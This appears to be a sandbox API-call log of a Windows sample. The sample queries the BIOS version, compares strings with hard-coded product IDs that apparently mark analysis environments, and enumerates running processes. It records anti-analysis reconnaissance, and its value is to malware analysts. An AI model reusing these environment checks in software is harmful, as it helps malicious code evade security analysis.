	[0069.909] GetLastError () returned 0xcb
	[0069.909] GetLastError () returned 0xcb
	[0069.909] GetLastError () returned 0xcb
	[0069.909] GetLastError () returned 0xcb
	[0069.909] GetLastError () returned 0xcb
	[0069.909] RegCreateKeyA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion", phkResult=0x25af7d4 | out: phkResult=0x25af7d4*=0x1f0) returned 0x0
	[0069.910] RegQueryValueExA (in: hKey=0x1f0, lpValueName="SystemBiosVersion", lpReserved=0x0, lpType=0x25af7cc, lpData=0x434fa8, lpcbData=0x25af7d0*=0x400 | out: lpType=0x25af7cc*=0x0, lpData=0x434fa8*=0x47, lpcbData=0x25af7d0*=0x400) returned 0x2
	[0069.912] RegCloseKey (hKey=0x1f0) returned 0x0
	[0069.912] GetLastError () returned 0xcb
	[0069.912] GetLastError () returned 0xcb
	[0069.912] GetLastError () returned 0xcb
	[0069.912] GetLastError () returned 0xcb
	[0069.912] GetLastError () returned 0xcb
	[0069.912] GetLastError () returned 0xcb
	[0069.912] GetLastError () returned 0xcb
	[0069.912] GetLastError () returned 0xcb
	[0069.913] GetLastError () returned 0xcb
	[0069.913] GetLastError () returned 0xcb
	[0069.913] GetLastError () returned 0xcb
	[0069.913] GetLastError () returned 0xcb
	[0069.913] GetLastError () returned 0xcb
	[0069.913] GetLastError () returned 0xcb
	[0069.913] GetLastError () returned 0xcb
	[0069.913] GetLastError () returned 0xcb
	[0069.913] GetLastError () returned 0xcb
	[0069.913] GetLastError () returned 0xcb
	[0069.913] GetLastError () returned 0xcb
	[0069.913] GetLastError () returned 0xcb
	[0069.913] GetLastError () returned 0xcb
	[0069.913] GetLastError () returned 0xcb
	[0069.913] GetLastError () returned 0xcb
	[0069.913] GetLastError () returned 0xcb
	[0069.913] GetLastError () returned 0xcb
	[0069.913] GetLastError () returned 0xcb
	[0069.913] GetLastError () returned 0xcb
	[0069.913] GetLastError () returned 0xcb
	[0069.913] GetLastError () returned 0xcb
	[0069.913] GetLastError () returned 0xcb
	[0069.913] GetLastError () returned 0xcb
	[0069.913] GetLastError () returned 0xcb
	[0069.913] GetLastError () returned 0xcb
	[0069.913] GetLastError () returned 0xcb
	[0069.913] GetLastError () returned 0xcb
	[0069.913] GetLastError () returned 0xcb
	[0069.913] GetLastError () returned 0xcb
	[0069.913] GetLastError () returned 0xcb
	[0069.913] GetLastError () returned 0xcb
	[0069.913] GetLastError () returned 0xcb
	[0069.913] GetLastError () returned 0xcb
	[0069.913] GetLastError () returned 0xcb
	[0069.913] GetLastError () returned 0xcb
	[0069.913] GetLastError () returned 0xcb
	[0069.913] GetLastError () returned 0xcb
	[0069.913] GetLastError () returned 0xcb
	[0069.913] GetLastError () returned 0xcb
	[0069.913] GetLastError () returned 0xcb
	[0069.914] StrStrA (lpFirst="GBT    - 1000", lpSrch="55274-640-2673064-23950") returned 0x0
	[0069.914] GetLastError () returned 0xcb
	[0069.914] GetLastError () returned 0xcb
	[0069.914] GetLastError () returned 0xcb
	[0069.914] GetLastError () returned 0xcb
	[0069.914] GetLastError () returned 0xcb
	[0069.914] GetLastError () returned 0xcb
	[0069.914] GetLastError () returned 0xcb
	[0069.914] GetLastError () returned 0xcb
	[0069.914] GetLastError () returned 0xcb
	[0069.914] GetLastError () returned 0xcb
	[0069.914] GetLastError () returned 0xcb
	[0069.914] GetLastError () returned 0xcb
	[0069.914] GetLastError () returned 0xcb
	[0069.914] GetLastError () returned 0xcb
	[0069.914] GetLastError () returned 0xcb
	[0069.914] GetLastError () returned 0xcb
	[0069.914] GetLastError () returned 0xcb
	[0069.914] GetLastError () returned 0xcb
	[0069.914] GetLastError () returned 0xcb
	[0069.914] GetLastError () returned 0xcb
	[0069.914] GetLastError () returned 0xcb
	[0069.914] GetLastError () returned 0xcb
	[0069.914] GetLastError () returned 0xcb
	[0069.914] GetLastError () returned 0xcb
	[0069.914] GetLastError () returned 0xcb
	[0069.914] GetLastError () returned 0xcb
	[0069.914] GetLastError () returned 0xcb
	[0069.914] GetLastError () returned 0xcb
	[0069.914] GetLastError () returned 0xcb
	[0069.914] GetLastError () returned 0xcb
	[0069.914] GetLastError () returned 0xcb
	[0069.914] GetLastError () returned 0xcb
	[0069.914] GetLastError () returned 0xcb
	[0069.914] GetLastError () returned 0xcb
	[0069.914] GetLastError () returned 0xcb
	[0069.914] GetLastError () returned 0xcb
	[0069.914] GetLastError () returned 0xcb
	[0069.914] GetLastError () returned 0xcb
	[0069.914] GetLastError () returned 0xcb
	[0069.914] GetLastError () returned 0xcb
	[0069.914] GetLastError () returned 0xcb
	[0069.914] GetLastError () returned 0xcb
	[0069.914] GetLastError () returned 0xcb
	[0069.914] GetLastError () returned 0xcb
	[0069.914] GetLastError () returned 0xcb
	[0069.914] GetLastError () returned 0xcb
	[0069.914] GetLastError () returned 0xcb
	[0069.914] GetLastError () returned 0xcb
	[0069.914] StrStrA (lpFirst="GBT    - 1000", lpSrch="76487-644-3177037-23510") returned 0x0
	[0069.914] GetLastError () returned 0xcb
	[0069.914] GetLastError () returned 0xcb
	[0069.914] GetLastError () returned 0xcb
	[0069.914] GetLastError () returned 0xcb
	[0069.914] GetLastError () returned 0xcb
	[0069.915] GetLastError () returned 0xcb
	[0069.915] GetLastError () returned 0xcb
	[0069.915] GetLastError () returned 0xcb
	[0069.915] GetLastError () returned 0xcb
	[0069.915] GetLastError () returned 0xcb
	[0069.915] GetLastError () returned 0xcb
	[0069.915] GetLastError () returned 0xcb
	[0069.915] GetLastError () returned 0xcb
	[0069.915] GetLastError () returned 0xcb
	[0069.915] GetLastError () returned 0xcb
	[0069.915] GetLastError () returned 0xcb
	[0069.915] GetLastError () returned 0xcb
	[0069.915] GetLastError () returned 0xcb
	[0069.915] GetLastError () returned 0xcb
	[0069.915] GetLastError () returned 0xcb
	[0069.915] GetLastError () returned 0xcb
	[0069.915] GetLastError () returned 0xcb
	[0069.915] GetLastError () returned 0xcb
	[0069.915] GetLastError () returned 0xcb
	[0069.915] GetLastError () returned 0xcb
	[0069.915] GetLastError () returned 0xcb
	[0069.915] GetLastError () returned 0xcb
	[0069.915] GetLastError () returned 0xcb
	[0069.915] GetLastError () returned 0xcb
	[0069.915] GetLastError () returned 0xcb
	[0069.915] GetLastError () returned 0xcb
	[0069.915] GetLastError () returned 0xcb
	[0069.915] GetLastError () returned 0xcb
	[0069.915] GetLastError () returned 0xcb
	[0069.915] GetLastError () returned 0xcb
	[0069.915] GetLastError () returned 0xcb
	[0069.915] GetLastError () returned 0xcb
	[0069.915] GetLastError () returned 0xcb
	[0069.915] GetLastError () returned 0xcb
	[0069.915] GetLastError () returned 0xcb
	[0069.915] GetLastError () returned 0xcb
	[0069.915] GetLastError () returned 0xcb
	[0069.915] GetLastError () returned 0xcb
	[0069.915] GetLastError () returned 0xcb
	[0069.915] GetLastError () returned 0xcb
	[0069.915] GetLastError () returned 0xcb
	[0069.915] GetLastError () returned 0xcb
	[0069.915] GetLastError () returned 0xcb
	[0069.915] StrStrA (lpFirst="GBT    - 1000", lpSrch="76487-337-8429955-22614") returned 0x0
	[0069.916] GetLastError () returned 0xcb
	[0069.916] GetLastError () returned 0xcb
	[0069.916] GetLastError () returned 0xcb
	[0069.916] GetLastError () returned 0xcb
	[0069.916] GetLastError () returned 0xcb
	[0069.916] GetLastError () returned 0xcb
	[0069.916] GetLastError () returned 0xcb
	[0069.916] GetLastError () returned 0xcb
	[0069.916] GetLastError () returned 0xcb
	[0069.916] GetLastError () returned 0xcb
	[0069.916] GetLastError () returned 0xcb
	[0069.916] GetLastError () returned 0xcb
	[0069.916] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77960000
	[0069.917] GetProcAddress (hModule=0x77960000, lpProcName="NtQuerySystemInformation") returned 0x779d7000
	[0069.917] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x25afaa4 | out: SystemInformation=0x0, ResultLength=0x25afaa4*=0x16618) returned 0xc0000004
	[0069.920] VirtualAlloc (lpAddress=0x0, dwSize=0x16718, flAllocationType=0x3000, flProtect=0x4) returned 0x690000
	[0069.920] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x690000, Length=0x16718, ResultLength=0x0 | out: SystemInformation=0x690000, ResultLength=0x0) returned 0x0
	[0069.923] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0069.923] GetProcAddress (hModule=0x765a0000, lpProcName="IsWow64Process") returned 0x765b9f10
	[0069.924] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0069.924] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x728280, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0069.924] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0069.924] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x728190, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0069.924] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0069.924] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x7280a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0069.924] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0069.924] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x728028, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0069.924] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0069.924] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x728190, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0069.924] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0069.924] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x728190, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0069.924] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0069.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x7281d8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0069.925] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0069.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x728190, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0069.925] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0069.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7280b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0069.925] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0069.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dd20, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0069.925] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0069.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7281d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0069.925] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0069.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x728028, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0069.926] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0069.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7280a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0069.926] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0069.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x728280, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0069.926] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0069.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x728028, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0069.926] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0069.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x728280, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0069.926] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0069.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x728250, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0069.926] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0069.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x728028, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0069.927] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x1f0
	[0069.927] IsWow64Process (in: hProcess=0x1f0, Wow64Process=0x25afa28 | out: Wow64Process=0x25afa28) returned 1
	[0069.927] CloseHandle (hObject=0x1f0) returned 1
	[0069.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x728028, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0069.927] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0069.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7281d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0069.927] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0069.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x728958, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0069.927] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x1f0
	[0069.927] IsWow64Process (in: hProcess=0x1f0, Wow64Process=0x25afa28 | out: Wow64Process=0x25afa28) returned 1
	[0069.927] CloseHandle (hObject=0x1f0) returned 1
	[0069.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x7289f8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0069.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0069.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x728028, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0069.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x1f0
	[0069.928] IsWow64Process (in: hProcess=0x1f0, Wow64Process=0x25afa28 | out: Wow64Process=0x25afa28) returned 1
	[0069.928] CloseHandle (hObject=0x1f0) returned 1
	[0069.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x728028, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0069.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x1f0
	[0069.928] IsWow64Process (in: hProcess=0x1f0, Wow64Process=0x25afa28 | out: Wow64Process=0x25afa28) returned 1
	[0069.928] CloseHandle (hObject=0x1f0) returned 1
	[0069.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x728028, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0069.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x1f0
	[0069.928] IsWow64Process (in: hProcess=0x1f0, Wow64Process=0x25afa28 | out: Wow64Process=0x25afa28) returned 1
	[0069.928] CloseHandle (hObject=0x1f0) returned 1
	[0069.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x728070, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0069.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x1f0
	[0069.929] IsWow64Process (in: hProcess=0x1f0, Wow64Process=0x25afa28 | out: Wow64Process=0x25afa28) returned 1
	[0069.929] CloseHandle (hObject=0x1f0) returned 1
	[0069.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x728758, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0069.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x1f0
	[0069.929] IsWow64Process (in: hProcess=0x1f0, Wow64Process=0x25afa28 | out: Wow64Process=0x25afa28) returned 1
	[0069.929] CloseHandle (hObject=0x1f0) returned 1
	[0069.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x728190, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0069.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x1f0
	[0069.929] IsWow64Process (in: hProcess=0x1f0, Wow64Process=0x25afa28 | out: Wow64Process=0x25afa28) returned 1
	[0069.929] CloseHandle (hObject=0x1f0) returned 1
	[0069.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x728250, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0069.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0069.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x728280, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0069.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x1f0
	[0069.929] IsWow64Process (in: hProcess=0x1f0, Wow64Process=0x25afa28 | out: Wow64Process=0x25afa28) returned 1
	[0069.929] CloseHandle (hObject=0x1f0) returned 1
	[0069.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x728190, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0069.930] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x1f0
	[0069.930] IsWow64Process (in: hProcess=0x1f0, Wow64Process=0x25afa28 | out: Wow64Process=0x25afa28) returned 1
	[0069.930] CloseHandle (hObject=0x1f0) returned 1
	[0069.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x728190, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0069.930] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x1f0
	[0069.930] IsWow64Process (in: hProcess=0x1f0, Wow64Process=0x25afa28 | out: Wow64Process=0x25afa28) returned 1
	[0069.930] CloseHandle (hObject=0x1f0) returned 1
	[0069.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x7288d8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0069.930] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0069.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x728280, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0069.930] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x1f0
	[0069.930] IsWow64Process (in: hProcess=0x1f0, Wow64Process=0x25afa28 | out: Wow64Process=0x25afa28) returned 1
	[0069.930] CloseHandle (hObject=0x1f0) returned 1
	[0069.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x728818, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0069.930] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x1f0
	[0069.930] IsWow64Process (in: hProcess=0x1f0, Wow64Process=0x25afa28 | out: Wow64Process=0x25afa28) returned 1
	[0069.931] CloseHandle (hObject=0x1f0) returned 1
	[0069.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dd40, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0069.931] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x1f0
	[0069.931] IsWow64Process (in: hProcess=0x1f0, Wow64Process=0x25afa28 | out: Wow64Process=0x25afa28) returned 1
	[0069.931] CloseHandle (hObject=0x1f0) returned 1
	[0069.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x7289b8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0069.931] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x1f0
	[0069.931] IsWow64Process (in: hProcess=0x1f0, Wow64Process=0x25afa28 | out: Wow64Process=0x25afa28) returned 1
	[0069.931] CloseHandle (hObject=0x1f0) returned 1
	[0069.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x71bd58, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0069.931] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x1f0
	[0069.931] IsWow64Process (in: hProcess=0x1f0, Wow64Process=0x25afa28 | out: Wow64Process=0x25afa28) returned 1
	[0069.931] CloseHandle (hObject=0x1f0) returned 1
	[0069.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x728738, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0069.931] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x1f0
	[0069.931] IsWow64Process (in: hProcess=0x1f0, Wow64Process=0x25afa28 | out: Wow64Process=0x25afa28) returned 1
	[0069.931] CloseHandle (hObject=0x1f0) returned 1
	[0069.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x728028, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0069.932] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x1f0
	[0069.932] IsWow64Process (in: hProcess=0x1f0, Wow64Process=0x25afa28 | out: Wow64Process=0x25afa28) returned 1
	[0069.932] CloseHandle (hObject=0x1f0) returned 1
	[0069.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x728028, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
